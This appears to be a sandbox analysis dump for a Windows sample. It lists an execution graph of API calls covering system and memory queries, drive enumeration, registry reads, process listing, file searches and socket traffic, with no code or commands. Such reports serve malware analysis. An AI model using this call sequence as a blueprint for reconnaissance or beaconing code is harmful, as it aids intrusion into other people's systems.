                                                              execution_graph 72254 1317830 72267 121dd50 72254->72267 72256 1317866 72257 131785a 72257->72256 72271 12212c0 72257->72271 72259 13178a6 72260 131789a 72260->72259 72261 1317950 72260->72261 72263 1317906 72260->72263 72275 121b500 localeconv localeconv 72261->72275 72264 1317944 72263->72264 72276 121b500 localeconv localeconv 72263->72276 72265 1317979 72268 121dd61 72267->72268 72277 121d1d0 72268->72277 72270 121dd89 72270->72257 72272 12212cc 72271->72272 72284 121e050 72272->72284 72274 12212fa 72274->72260 72275->72265 72276->72265 72283 121d1ed 72277->72283 72278 121d504 localeconv 72278->72283 72279 121c9c0 localeconv 72279->72283 72280 121ca50 localeconv 72280->72283 72281 121d3ae 72281->72270 72282 121cc90 localeconv 72282->72283 72283->72278 72283->72279 72283->72280 72283->72281 72283->72282 72285 121e09d localeconv localeconv 72284->72285 72298 121e503 72284->72298 72291 121e0ce 72285->72291 72286 121e18e 72288 121ed90 ungetc 72286->72288 72297 121e1a6 72286->72297 72287 1220250 ungetc 72287->72298 72288->72297 72289 121fee7 72305 121dff0 ungetc 72289->72305 72290 121feb6 isxdigit 72290->72298 72291->72286 72295 121e388 72291->72295 72291->72297 72291->72298 72299 121e243 72291->72299 72293 1220742 ungetc 72293->72297 72294 12211a4 ungetc 72294->72298 72295->72297 72295->72298 72304 12200b8 ungetc 72295->72304 72296 12208d7 ungetc 72296->72298 72297->72274 72298->72287 72298->72289 72298->72290 72298->72294 72298->72296 72298->72297 72298->72299 72301 1220e3e ungetc 72298->72301 72303 1220006 ungetc 72298->72303 72306 121dff0 ungetc 72298->72306 72307 121b1a0 islower islower 72298->72307 72299->72293 72299->72297 72301->72298 72303->72298 72304->72295 72305->72297 72306->72298 72307->72298 72308 ead5e0 72309 ead652 WSAStartup 72308->72309 72310 ead5f0 72308->72310 72309->72310 72311 ead664 72309->72311 72313 ead67c 72310->72313 72315 ead690 localeconv localeconv 72310->72315 72314 ead5fa 72315->72314 72316 ea1139 72332 ecbaa0 72316->72332 72318 ea1148 72319 ea1512 72318->72319 72321 ea1161 72318->72321 72322 ea1527 72319->72322 72340 e9fec0 12 API calls 72319->72340 72329 ea0f00 72321->72329 72336 ea0150 72321->72336 72322->72329 72341 ea22d0 12 API calls 72322->72341 72326 ea0150 localeconv localeconv 72326->72329 72328 ea0f7b 72329->72326 72329->72328 72331 e975a0 localeconv localeconv 72329->72331 72342 ecd4d0 7 API calls 72329->72342 72343 ea4940 localeconv localeconv 72329->72343 72344 ea3900 localeconv localeconv 72329->72344 72331->72329 72333 ecbb60 72332->72333 72335 ecbac7 72332->72335 72333->72318 72335->72333 72345 eb05b0 localeconv localeconv 72335->72345 72338 ea0167 72336->72338 72337 ea01c3 72337->72329 72338->72337 72346 ea30d0 localeconv localeconv 72338->72346 72340->72322 72341->72329 72342->72329 72343->72329 72344->72329 72345->72333 72346->72337 72347 f44720 72351 f44728 72347->72351 72348 f44733 72350 f44774 72351->72348 72358 f4476c 72351->72358 72359 f45540 7 API calls 72351->72359 72353 f4482e 72353->72358 72360 f49270 72353->72360 72355 f44860 72365 f44950 72355->72365 72357 f44878 72358->72357 72371 f430a0 7 API calls 72358->72371 72359->72353 72372 f4a440 72360->72372 72362 f49297 72364 f492ab 72362->72364 72403 f4bbe0 7 API calls 72362->72403 72364->72355 72366 f44966 72365->72366 72368 f449c5 72366->72368 72370 f449b9 72366->72370 72404 f4bbe0 7 API calls 72366->72404 72367 f44aa0 gethostname 72367->72368 72367->72370 72368->72358 72370->72367 72370->72368 72371->72350 72398 f4a46b 72372->72398 72373 f4aa03 RegOpenKeyExA 72374 f4aa27 RegQueryValueExA 72373->72374 72375 f4ab70 RegOpenKeyExA 72373->72375 72376 f4aa71 72374->72376 72377 f4aacc RegQueryValueExA 72374->72377 72378 f4ac34 RegOpenKeyExA 72375->72378 72395 f4ab90 72375->72395 72376->72377 72384 f4aa85 RegQueryValueExA 72376->72384 72380 f4ab66 RegCloseKey 72377->72380 72381 f4ab0e 72377->72381 72379 f4acf8 RegOpenKeyExA 72378->72379 72397 f4ac54 72378->72397 72382 f4ad56 RegEnumKeyExA 72379->72382 72385 f4ad14 72379->72385 72380->72375 72381->72380 72388 f4ab1e RegQueryValueExA 72381->72388 72383 f4ad9b 72382->72383 72382->72385 72386 f4ae16 RegOpenKeyExA 72383->72386 72387 f4aab3 72384->72387 72385->72362 72389 f4ae34 RegQueryValueExA 72386->72389 72390 f4addf RegEnumKeyExA 72386->72390 72387->72377 72392 f4ab4c 72388->72392 72391 f4af43 RegQueryValueExA 72389->72391 72402 f4adaa 72389->72402 72390->72385 72390->72386 72393 f4b052 RegQueryValueExA 72391->72393 72391->72402 72392->72380 72394 f4adc7 RegCloseKey 72393->72394 72393->72402 72394->72390 72395->72378 72396 f4afa0 RegQueryValueExA 72396->72402 72397->72379 72399 f4d190 localeconv localeconv 72398->72399 72400 f4a4db 72398->72400 72401 f4b180 localeconv localeconv 72398->72401 72399->72398 72400->72373 72400->72385 72401->72398 72402->72391 72402->72393 72402->72394 72402->72396 72403->72364 72404->72370 72405 e929ff FindFirstFileA 72406 e92a31 72405->72406 72407 e92a5c RegOpenKeyExA 72406->72407 72408 e92a93 72407->72408 72409 e92ade CharUpperA 72408->72409 72410 e92b0a 72409->72410 72411 e92bf9 QueryFullProcessImageNameA 72410->72411 72412 e92c3b CloseHandle 72411->72412 72414 e92c64 72412->72414 72413 e92df1 CloseHandle 72415 e92e23 72413->72415 72414->72413 72416 e9f7b0 72417 e9f97a 72416->72417 72421 e9f7c3 72416->72421 72418 ea0150 2 API calls 72425 e9f854 72418->72425 72419 e9f932 72439 eccd80 72419->72439 72421->72417 72421->72418 72422 e9f942 72423 e9f987 72422->72423 72424 ee1390 2 API calls 72422->72424 72460 ee1390 72423->72460 72424->72422 72425->72417 72425->72419 72468 e9fec0 12 API calls 72425->72468 72429 ee1390 2 API calls 72430 e9f9a0 72429->72430 72431 ee1390 2 API calls 72430->72431 72432 e9f9ac 72431->72432 72433 e9f9bb WSACloseEvent 72432->72433 72464 e975a0 72433->72464 72436 e975a0 2 API calls 72437 e9fa12 72436->72437 72438 e975a0 2 API calls 72437->72438 72438->72417 72440 ecd0f1 72439->72440 72447 eccd9a 72439->72447 72440->72422 72441 ecd0e5 72442 ee1390 2 API calls 72441->72442 72442->72440 72443 ecd0b4 72490 eaf6c0 12 API calls 72443->72490 72447->72441 72453 ecce6b 72447->72453 72469 ecdc30 7 API calls 72447->72469 72448 ecd064 72448->72443 72489 ecde00 7 API calls 72448->72489 72451 ecd016 72451->72448 72488 ecde00 7 API calls 72451->72488 72453->72448 72455 eccf4b 72453->72455 72470 ecdc30 7 API calls 72453->72470 72455->72451 72456 ecd018 72455->72456 72471 ece130 7 API calls 72455->72471 72472 ecdf30 72455->72472 72478 ea6fa0 72455->72478 72486 ea7380 localeconv localeconv 72455->72486 72487 ea7380 localeconv localeconv 72456->72487 72461 ee139d 72460->72461 72463 e9f98d 72460->72463 72462 e975a0 2 API calls 72461->72462 72462->72463 72463->72429 72465 e975aa 72464->72465 72467 e975d1 72464->72467 72465->72467 72493 e972a0 localeconv localeconv 72465->72493 72467->72436 72468->72425 72469->72447 72470->72453 72471->72455 72475 ecdf44 72472->72475 72473 ecdfb5 72473->72455 72475->72473 72476 ecdfb9 72475->72476 72491 ea7450 localeconv localeconv 72475->72491 72492 ea7380 localeconv localeconv 72476->72492 72479 ea6fd4 72478->72479 72480 ea6feb 72478->72480 72479->72480 72481 ea7207 select 72479->72481 72480->72455 72481->72480 72485 ea7233 72481->72485 72482 ea726b __WSAFDIsSet 72483 ea729a __WSAFDIsSet 72482->72483 72482->72485 72484 ea72ba __WSAFDIsSet 72483->72484 72483->72485 72484->72485 72485->72480 72485->72482 72485->72483 72485->72484 72486->72455 72487->72451 72488->72451 72489->72448 72490->72441 72491->72475 72492->72473 72493->72467 72494 ec95b0 72495 ec95c8 72494->72495 72496 ec95fd 72494->72496 72495->72496 72498 eca150 72495->72498 72499 eca15f 72498->72499 72508 eca246 72498->72508 72500 eca181 getsockname 72499->72500 72499->72508 72501 eca1f7 72500->72501 72503 eca1d0 72500->72503 72511 ecef30 72501->72511 72510 ead090 localeconv localeconv 72503->72510 72505 eca1eb 72521 ed4f40 localeconv localeconv 72505->72521 72508->72496 72510->72505 72512 ecefa8 72511->72512 72513 ecef47 72511->72513 72519 eca20f 72512->72519 72524 e9c960 localeconv localeconv 72512->72524 72514 ecef4c 72513->72514 72515 ecef81 72513->72515 72514->72519 72522 ef3d10 localeconv localeconv 72514->72522 72523 ef3d10 localeconv localeconv 72515->72523 72519->72508 72520 ead090 localeconv localeconv 72519->72520 72520->72505 72521->72508 72522->72519 72523->72519 72524->72519 72525 ec6ab0 72526 ec6ad5 72525->72526 72527 ec6bb4 72526->72527 72529 ea6fa0 4 API calls 72526->72529 72528 f45ed0 11 API calls 72527->72528 72530 ec6ba9 72528->72530 72531 ec6b54 72529->72531 72531->72527 72531->72530 72532 ec6b5d 72531->72532 72532->72530 72534 f45ed0 72532->72534 72537 f45a50 72534->72537 72536 f45ee5 72536->72532 72538 f45a58 72537->72538 72545 f45ea0 72537->72545 72539 f45b50 72538->72539 72552 f45b88 72538->72552 72553 f45a99 72538->72553 72542 f45eb4 72539->72542 72543 f45b7a 72539->72543 72539->72552 72540 f45e96 72578 f59480 7 API calls 72540->72578 72579 f46f10 7 API calls 72542->72579 72564 f470a0 72543->72564 72545->72536 72548 f45ec2 72548->72548 72550 f45be2 __WSAFDIsSet 72550->72553 72551 f45da1 __WSAFDIsSet 72558 f45cae 72551->72558 72552->72558 72574 f46d50 localeconv localeconv 72552->72574 72575 f45ef0 6 API calls 72552->72575 72553->72550 72553->72552 72556 f470a0 8 API calls 72553->72556 72573 f46f10 7 API calls 72553->72573 72556->72553 72558->72540 72558->72551 72560 f5a920 72558->72560 72576 f46d50 localeconv localeconv 72558->72576 72577 f59320 7 API calls 72558->72577 72561 f5a944 72560->72561 72562 f5a94b 72561->72562 72563 f5a977 send 72561->72563 72562->72558 72563->72558 72565 f470ae 72564->72565 72567 f4717f 72565->72567 72572 f471a7 72565->72572 72580 f5a8c0 72565->72580 72584 f471c0 6 API calls 72565->72584 72567->72572 72585 f46d50 localeconv localeconv 72567->72585 72569 f4719f 72586 f59320 7 API calls 72569->72586 72572->72552 72573->72553 72574->72552 72575->72552 72576->72558 72577->72558 72578->72545 72579->72548 72581 f5a8e6 72580->72581 72582 f5a903 recvfrom 72580->72582 72581->72582 72583 f5a8ed 72581->72583 72582->72583 72583->72565 72584->72565 72585->72569 72586->72572 72587 7170408 72588 71703d5 Process32FirstW 72587->72588 72590 7170412 72587->72590 72588->72590 72591 e913c9 72594 e91160 72591->72594 72595 e913a1 72594->72595 72596 12193e0 72594->72596 72606 1218a20 16 API calls 72594->72606 72597 12193f3 72596->72597 72603 1219400 72596->72603 72597->72594 72598 1219688 72598->72597 72599 12196c7 72598->72599 72607 1219280 vfprintf 72598->72607 72608 1219220 vfprintf 72599->72608 72602 12196df 72602->72594 72603->72597 72603->72598 72603->72599 72604 1219220 vfprintf 72603->72604 72605 1219280 vfprintf 72603->72605 72604->72603 72605->72603 72606->72594 72607->72598 72608->72602 72609 131f250 72617 1221360 72609->72617 72611 131f28e 72612 131f282 72612->72611 72613 1221360 2 API calls 72612->72613 72614 131f2d3 72613->72614 72616 131f2ec 72614->72616 72624 1221420 localeconv localeconv 72614->72624 72618 12213b0 72617->72618 72619 1221379 72617->72619 72621 121d1d0 2 API calls 72618->72621 72620 121d1d0 2 API calls 72619->72620 72622 1221398 72620->72622 72623 12213d0 72621->72623 72622->72612 72623->72612 72624->72616 72625 121b180 Sleep 72626 ecb3c0 72627 ecb3ee 72626->72627 72628 ecb3cb 72626->72628 72632 ec9290 72628->72632 72646 e976a0 72628->72646 72629 ecb3ea 72633 e976a0 3 API calls 72632->72633 72634 ec92e5 72633->72634 72635 ec93c3 72634->72635 72636 ec92f3 72634->72636 72640 ec9392 72635->72640 72657 ead090 localeconv localeconv 72635->72657 72639 ec9335 WSAIoctl 72636->72639 72636->72640 72638 ec93f7 72658 ed4f40 localeconv localeconv 72638->72658 72639->72640 72643 ec9366 72639->72643 72644 ec93be 72640->72644 72659 ed50a0 localeconv localeconv 72640->72659 72643->72640 72645 ec9371 setsockopt 72643->72645 72644->72629 72645->72640 72647 e976c0 72646->72647 72648 e976e6 send 72646->72648 72647->72648 72650 e976c9 72647->72650 72649 e976d3 72648->72649 72653 e97704 72648->72653 72660 e972a0 localeconv localeconv 72649->72660 72650->72649 72652 e9770b 72650->72652 72661 e972a0 localeconv localeconv 72652->72661 72653->72629 72655 e9771c 72662 e9cb20 localeconv localeconv 72655->72662 72657->72638 72658->72640 72659->72644 72660->72653 72661->72655 72662->72653 72663 ece400 72664 ece412 72663->72664 72668 ece459 72663->72668 72665 ece422 72664->72665 72687 ee3030 localeconv localeconv 72664->72687 72688 ef09d0 localeconv localeconv 72665->72688 72669 ece4a8 72668->72669 72674 ece495 72668->72674 72675 ecb5a0 72668->72675 72670 ece42b 72689 ec68b0 7 API calls 72670->72689 72673 ecb5a0 2 API calls 72673->72669 72674->72669 72674->72673 72676 ecb5d2 72675->72676 72677 ecb5c0 72675->72677 72676->72674 72677->72676 72678 ecb713 72677->72678 72681 ecb626 72677->72681 72691 ed4f40 localeconv localeconv 72678->72691 72680 ecb65a 72680->72676 72682 ecb72b 72680->72682 72683 ecb737 72680->72683 72681->72676 72681->72680 72681->72682 72681->72683 72690 ed50a0 localeconv localeconv 72681->72690 72682->72676 72692 ed50a0 localeconv localeconv 72682->72692 72683->72676 72693 ed50a0 localeconv localeconv 72683->72693 72687->72665 72688->72670 72689->72668 72690->72681 72691->72676 72692->72676 72693->72676 72694 ecb400 72695 ecb40b 72694->72695 72696 ecb425 72694->72696 72699 e97770 72695->72699 72697 ecb421 72700 e97790 72699->72700 72701 e977b6 recv 72699->72701 72700->72701 72702 e97799 72700->72702 72703 e977a3 72701->72703 72709 e977d4 72701->72709 72702->72703 72704 e977db 72702->72704 72710 e972a0 localeconv localeconv 72703->72710 72711 e972a0 localeconv localeconv 72704->72711 72707 e977ec 72712 e9cb20 localeconv localeconv 72707->72712 72709->72697 72710->72709 72711->72707 72712->72709 72713 ed0700 72721 ed0719 72713->72721 72727 ed099d 72713->72727 72716 ed09f6 72724 e975a0 2 API calls 72716->72724 72718 ed09b5 72718->72727 72738 ed50a0 localeconv localeconv 72718->72738 72720 ed0a35 72739 ed4f40 localeconv localeconv 72720->72739 72721->72716 72721->72718 72721->72720 72721->72727 72731 e97310 localeconv localeconv 72721->72731 72732 ecb8e0 localeconv localeconv 72721->72732 72733 eff570 localeconv localeconv 72721->72733 72734 ebeb30 localeconv localeconv 72721->72734 72735 ef13a0 localeconv localeconv 72721->72735 72736 f139a0 localeconv localeconv 72721->72736 72737 ebeae0 localeconv localeconv 72721->72737 72728 ed0a11 72724->72728 72729 e975a0 2 API calls 72728->72729 72729->72727 72731->72721 72732->72721 72733->72721 72734->72721 72735->72721 72736->72721 72737->72721 72738->72727 72739->72727 72740 ecf6c3 72743 ecf6e3 72740->72743 72748 ecf7b9 72740->72748 72741 ecf72e 72742 ecf7f4 72741->72742 72747 ecf743 72741->72747 72744 ecf800 72742->72744 72760 ed0c80 localeconv localeconv 72742->72760 72743->72741 72756 ed50a0 localeconv localeconv 72743->72756 72747->72744 72753 ed50a0 localeconv localeconv 72747->72753 72757 e9fa50 localeconv localeconv 72747->72757 72758 ed0d30 localeconv localeconv 72747->72758 72748->72743 72748->72744 72759 ed4fd0 localeconv localeconv 72748->72759 72749 ecff5b 72755 ed0034 72749->72755 72761 ed50a0 localeconv localeconv 72749->72761 72753->72747 72756->72741 72757->72747 72758->72747 72759->72743 72760->72749 72761->72755 72762 e9255d 72810 1219f70 72762->72810 72765 e92589 72766 e925a0 GlobalMemoryStatusEx 72765->72766 72767 e925ec 72766->72767 72812 7130008 72767->72812 72816 7130028 72767->72816 72820 713016c 72767->72820 72824 71302aa 72767->72824 72828 7130368 72767->72828 72832 7130220 72767->72832 72836 7130260 72767->72836 72840 71303bd 72767->72840 72844 71301e1 72767->72844 72848 71300bf 72767->72848 72852 713037e 72767->72852 72856 71302f6 72767->72856 72860 7130076 72767->72860 72864 71301b2 72767->72864 72868 7130130 72767->72868 72872 7130233 72767->72872 72876 7130372 72767->72876 72880 713039c 72767->72880 72884 713028f 72767->72884 72888 7130000 72767->72888 72892 71301c4 72767->72892 72896 7130101 72767->72896 72900 7130200 72767->72900 72904 7130143 72767->72904 72908 71302c1 72767->72908 72912 713009e 72767->72912 72916 7130156 72767->72916 72920 71300d4 72767->72920 72924 7130058 72767->72924 72928 7130317 72767->72928 72932 71302d0 72767->72932 72936 71301d1 72767->72936 72940 7130352 72767->72940 72811 e9256c GetSystemInfo 72810->72811 72811->72765 72813 713000c GetLogicalDrives 72812->72813 72815 713040f 72813->72815 72817 7130067 GetLogicalDrives 72816->72817 72819 713040f 72817->72819 72821 7130185 GetLogicalDrives 72820->72821 72823 713040f 72821->72823 72825 71302c6 GetLogicalDrives 72824->72825 72827 713040f 72825->72827 72829 7130377 GetLogicalDrives 72828->72829 72831 713040f 72829->72831 72833 713022c GetLogicalDrives 72832->72833 72835 713040f 72833->72835 72837 7130206 GetLogicalDrives 72836->72837 72839 713040f 72837->72839 72841 713037e GetLogicalDrives 72840->72841 72843 713040f 72841->72843 72845 7130208 GetLogicalDrives 72844->72845 72847 713040f 72845->72847 72849 71300c5 GetLogicalDrives 72848->72849 72851 713040f 72849->72851 72853 7130389 GetLogicalDrives 72852->72853 72855 713040f 72853->72855 72857 7130328 GetLogicalDrives 72856->72857 72859 713040f 72857->72859 72861 7130065 GetLogicalDrives 72860->72861 72863 713040f 72861->72863 72865 71301b5 GetLogicalDrives 72864->72865 72867 713040f 72865->72867 72869 71300ce GetLogicalDrives 72868->72869 72871 713040f 72869->72871 72873 7130236 GetLogicalDrives 72872->72873 72875 713040f 72873->72875 72877 7130377 GetLogicalDrives 72876->72877 72879 713040f 72877->72879 72881 71303a1 GetLogicalDrives 72880->72881 72883 713040f 72881->72883 72885 71302a2 GetLogicalDrives 72884->72885 72887 713040f 72885->72887 72889 713000c GetLogicalDrives 72888->72889 72891 713040f 72889->72891 72893 71301d7 GetLogicalDrives 72892->72893 72895 713040f 72893->72895 72897 713010b GetLogicalDrives 72896->72897 72899 713040f 72897->72899 72901 7130208 GetLogicalDrives 72900->72901 72903 713040f 72901->72903 72905 7130162 GetLogicalDrives 72904->72905 72907 713040f 72905->72907 72909 71302e2 GetLogicalDrives 72908->72909 72911 713040f 72909->72911 72913 71300e8 GetLogicalDrives 72912->72913 72915 713040f 72913->72915 72917 713011d GetLogicalDrives 72916->72917 72919 713040f 72917->72919 72921 71300fa GetLogicalDrives 72920->72921 72923 713040f 72921->72923 72925 7130065 GetLogicalDrives 72924->72925 72927 713040f 72925->72927 72929 713031f GetLogicalDrives 72928->72929 72931 713040f 72929->72931 72933 71302f9 GetLogicalDrives 72932->72933 72935 713040f 72933->72935 72937 71301d7 GetLogicalDrives 72936->72937 72939 713040f 72937->72939 72941 7130355 GetLogicalDrives 72940->72941 72943 713040f 72941->72943 72944 f43c00 72945 f43c23 72944->72945 72947 f43c0d 72944->72947 72945->72947 72948 f5b180 72945->72948 72951 f5b19b 72948->72951 72955 f5b2e3 72948->72955 72952 f5b2a9 getsockname 72951->72952 72953 f5b020 closesocket 72951->72953 72951->72955 72956 f5af30 72951->72956 72960 f5b060 72951->72960 72965 f5b020 72952->72965 72953->72951 72955->72947 72957 f5af63 socket 72956->72957 72958 f5af4c 72956->72958 72957->72951 72958->72957 72959 f5af52 72958->72959 72959->72951 72962 f5b080 72960->72962 72961 f5b0b0 connect 72963 f5b0bf WSAGetLastError 72961->72963 72962->72961 72962->72963 72964 f5b0ea 72962->72964 72963->72962 72963->72964 72964->72951 72966 f5b052 72965->72966 72967 f5b029 72965->72967 72966->72951 72968 f5b04b closesocket 72967->72968 72969 f5b03e 72967->72969 72968->72966 72969->72951 72970 f5a080 72973 f59740 72970->72973 72972 f5a09b 72974 f59780 72973->72974 72979 f5975d 72973->72979 72975 f59925 RegOpenKeyExA 72974->72975 72974->72979 72976 f5995a RegQueryValueExA 72975->72976 72980 f59812 72975->72980 72977 f59986 RegCloseKey 72976->72977 72977->72979 72979->72980 72981 f4d190 localeconv localeconv 72979->72981 72980->72972 72981->72979 72982 e93d5e 72983 e93d30 72982->72983 72983->72982 72984 e93d90 72983->72984 72988 ea0ab0 72983->72988 72991 e9fcb0 12 API calls 72984->72991 72987 e93dc1 72992 ea05b0 72988->72992 72991->72987 72993 ea07c7 72992->72993 73003 ea05bd 72992->73003 72993->72983 72994 ea066a 73011 ecdec0 72994->73011 72998 ea067b 73001 ea06f0 72998->73001 73005 ea07ce 72998->73005 73018 ea73b0 localeconv localeconv 72998->73018 73002 ea07ef 73001->73002 73004 ea0707 WSAEventSelect 73001->73004 73007 e976a0 3 API calls 73001->73007 73002->73005 73006 ea6fa0 4 API calls 73002->73006 73010 ea0847 73002->73010 73003->72993 73003->72994 73003->73005 73016 ea03c0 localeconv localeconv 73003->73016 73017 ea7450 localeconv localeconv 73003->73017 73004->73001 73004->73005 73019 ea7380 localeconv localeconv 73005->73019 73006->73010 73007->73001 73008 ea09e8 WSAEnumNetworkEvents 73009 ea09d0 WSAEventSelect 73008->73009 73008->73010 73009->73008 73009->73010 73010->73005 73010->73008 73010->73009 73012 ecdf1e 73011->73012 73014 ecdece 73011->73014 73013 ecdf30 2 API calls 73015 ecdef9 73013->73015 73014->73013 73015->72998 73016->73003 73017->73003 73018->72998 73019->72993 73020 ec8b50 73021 ec8b6b 73020->73021 73040 ec8be6 73020->73040 73022 ec8b8f 73021->73022 73023 ec8bf3 73021->73023 73021->73040 73112 ea6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 73022->73112 73053 eca550 73023->73053 73027 ec8cd9 SleepEx 73038 ec8d13 73027->73038 73028 eca150 3 API calls 73042 ec8dff 73028->73042 73029 ec8e85 73032 ec8eae 73029->73032 73029->73040 73118 ea2a00 localeconv localeconv 73029->73118 73030 ec8c1f connect 73031 ec8c35 73030->73031 73036 eca150 3 API calls 73031->73036 73032->73040 73119 e978b0 closesocket 73032->73119 73034 ec8cb2 73034->73028 73034->73029 73034->73040 73041 ec8c4d 73036->73041 73037 ec8bb5 73037->73040 73114 ed50a0 localeconv localeconv 73037->73114 73038->73034 73039 ec8d43 73038->73039 73044 eca150 3 API calls 73039->73044 73052 ec8c8b 73041->73052 73113 ed50a0 localeconv localeconv 73041->73113 73042->73029 73116 ead090 localeconv localeconv 73042->73116 73044->73037 73046 ec8dc8 73115 ecb100 localeconv localeconv 73046->73115 73047 ec8ba1 73047->73027 73047->73034 73047->73037 73048 ec8e67 73117 ed4fd0 localeconv localeconv 73048->73117 73052->73046 73052->73047 73054 eca575 73053->73054 73056 eca597 73054->73056 73123 e975e0 73054->73123 73057 ecef30 2 API calls 73056->73057 73105 eca6d9 73056->73105 73059 eca63a 73057->73059 73058 eca709 73060 e978b0 3 API calls 73058->73060 73067 eca713 73058->73067 73065 eca641 73059->73065 73069 eca69b 73059->73069 73060->73067 73061 ec8bfc 73061->73030 73061->73031 73061->73034 73061->73040 73063 eca7e5 73068 eca811 setsockopt 73063->73068 73073 eca87c 73063->73073 73083 eca8ee 73063->73083 73065->73063 73140 ed4fd0 localeconv localeconv 73065->73140 73067->73061 73139 ed50a0 localeconv localeconv 73067->73139 73068->73073 73076 eca83b 73068->73076 73136 ead090 localeconv localeconv 73069->73136 73071 eca6c9 73137 ed4f40 localeconv localeconv 73071->73137 73073->73083 73143 ecb1e0 localeconv localeconv 73073->73143 73076->73073 73141 ead090 localeconv localeconv 73076->73141 73077 ecaf56 73079 ecaf5d 73077->73079 73077->73105 73079->73067 73082 eca150 3 API calls 73079->73082 73080 eca86d 73142 ed4fd0 localeconv localeconv 73080->73142 73082->73067 73085 ecabb9 73083->73085 73086 ecacb8 73083->73086 73087 ecae32 73083->73087 73091 ecaf33 73083->73091 73083->73105 73107 ecabe1 73083->73107 73084 ecb056 73154 ead090 localeconv localeconv 73084->73154 73089 ecad45 73085->73089 73094 ecade6 73085->73094 73085->73107 73145 ec6be0 15 API calls 73085->73145 73086->73085 73093 ecacdc 73086->73093 73086->73105 73087->73085 73151 ed4fd0 localeconv localeconv 73087->73151 73088 ecaf03 73088->73091 73152 ed4fd0 localeconv localeconv 73088->73152 73089->73094 73097 ecad5f 73089->73097 73135 ef67e0 ioctlsocket 73091->73135 73144 ead090 localeconv localeconv 73093->73144 73149 ead090 localeconv localeconv 73094->73149 73146 ee20d0 localeconv localeconv 73097->73146 73100 ecb07b 73155 ed4f40 localeconv localeconv 73100->73155 73101 ecad7b 73103 ecadb7 73101->73103 73147 ed4fd0 localeconv localeconv 73101->73147 73148 ee3030 localeconv localeconv 73103->73148 73105->73058 73105->73067 73138 ea2a00 localeconv localeconv 73105->73138 73107->73084 73107->73088 73107->73105 73153 ed4fd0 localeconv localeconv 73107->73153 73108 ecad01 73150 ed4f40 localeconv localeconv 73108->73150 73112->73047 73113->73052 73114->73040 73115->73034 73116->73048 73117->73029 73118->73032 73120 e978d7 73119->73120 73121 e978c5 73119->73121 73120->73040 73159 e972a0 localeconv localeconv 73121->73159 73124 e975ef 73123->73124 73125 e97607 socket 73123->73125 73124->73125 73127 e97601 73124->73127 73128 e97643 73124->73128 73126 e9762b 73125->73126 73131 e9763a 73125->73131 73156 e972a0 localeconv localeconv 73126->73156 73127->73125 73157 e972a0 localeconv localeconv 73128->73157 73131->73056 73132 e97654 73158 e9cb20 localeconv localeconv 73132->73158 73134 e97674 73134->73056 73135->73077 73136->73071 73137->73105 73138->73058 73139->73061 73140->73063 73141->73080 73142->73073 73143->73083 73144->73108 73145->73089 73146->73101 73147->73103 73148->73107 73149->73108 73150->73105 73151->73085 73152->73091 73153->73107 73154->73100 73155->73105 73156->73131 73157->73132 73158->73134 73159->73120 73160 e931d7 73161 e931f4 73160->73161 73162 e93200 73161->73162 73166 e93223 73161->73166 73167 e915b0 localeconv localeconv 73162->73167 73164 e9321e 73165 e932dc CloseHandle 73165->73164 73166->73165 73167->73164 73168 e92f17 73177 e92f2c 73168->73177 73169 e931d3 73172 e9315c RegEnumKeyExA 73172->73177 73173 e91619 2 API calls 73174 e93046 RegOpenKeyExA 73173->73174 73175 e93089 RegQueryValueExA 73174->73175 73174->73177 73176 e9313b RegCloseKey 73175->73176 73175->73177 73176->73177 73177->73169 73177->73172 73177->73173 73177->73176 73178 e91619 73177->73178 73179 1221360 2 API calls 73178->73179 73180 e91645 RegOpenKeyExA 73179->73180 73180->73177 73181 7180427 73182 71803ef 73181->73182 73183 718040c Process32NextW 73182->73183 73184 7180421 73182->73184 73183->73184

                                                              Executed Functions

                                                              Function 00E9255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 839 e9255d-e92614 call 1219f70 GetSystemInfo call 1319af0 call 1319ce0 GlobalMemoryStatusEx call 1319af0 call 1319ce0 921 e92619 call 7130352 839->921 922 e92619 call 71301d1 839->922 923 e92619 call 71302d0 839->923 924 e92619 call 7130317 839->924 925 e92619 call 7130156 839->925 926 e92619 call 71300d4 839->926 927 e92619 call 7130058 839->927 928 e92619 call 713009e 839->928 929 e92619 call 713039c 839->929 930 e92619 call 7130143 839->930 931 e92619 call 71302c1 839->931 932 e92619 call 7130101 839->932 933 e92619 call 7130200 839->933 934 e92619 call 7130000 839->934 935 e92619 call 71301c4 839->935 936 e92619 call 7130008 839->936 937 e92619 call 713028f 839->937 938 e92619 call 7130233 839->938 939 e92619 call 7130372 839->939 940 e92619 call 71301b2 839->940 941 e92619 call 7130130 839->941 942 e92619 call 71302f6 839->942 943 e92619 call 7130076 839->943 944 e92619 call 71300bf 839->944 945 e92619 call 713037e 839->945 946 e92619 call 71303bd 839->946 947 e92619 call 71301e1 839->947 948 e92619 call 7130220 839->948 949 e92619 call 7130260 839->949 950 e92619 call 71302aa 839->950 951 e92619 call 7130368 839->951 952 e92619 call 7130028 839->952 953 e92619 call 713016c 839->953 850 e9261b-e92620 851 e9277c-e92904 call 1319af0 call 1319ce0 KiUserCallbackDispatcher call 1319af0 call 1319ce0 call 1319af0 call 1319ce0 call 1218e38 call 1218be0 call 1218bd0 FindFirstFileW 850->851 852 e92626-e92637 call 13198f0 850->852 899 e92928-e9292c 851->899 900 e92906-e92926 FindNextFileW 851->900 856 e92754-e9275c 852->856 858 e9263c-e9264f GetDriveTypeA 856->858 859 e92762-e92777 call 1319ce0 856->859 861 e92743-e92751 call 1218b98 858->861 862 e92655-e92685 GetDiskFreeSpaceExA 858->862 859->851 861->856 862->861 865 e9268b-e9273e call 1319bc0 call 1319c50 call 1319ce0 call 13199e0 call 1319ce0 call 13199e0 call 1319ce0 call 1318050 862->865 865->861 901 e9292e 899->901 902 e92932-e9296f call 1319af0 call 1319ce0 call 1218e78 899->902 900->899 900->900 901->902 908 e92974-e92979 902->908 909 e929a9-e929fe call 121a2b0 call 1319af0 call 1319ce0 908->909 910 e9297b-e929a4 call 1319af0 call 1319ce0 908->910 910->909 921->850 922->850 923->850 924->850 925->850 926->850 927->850 928->850 929->850 930->850 931->850 932->850 933->850 934->850 935->850 936->850 937->850 938->850 939->850 940->850 941->850 942->850 943->850 944->850 945->850 946->850 947->850 948->850 949->850 950->850 951->850 952->850 953->850
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00E92579
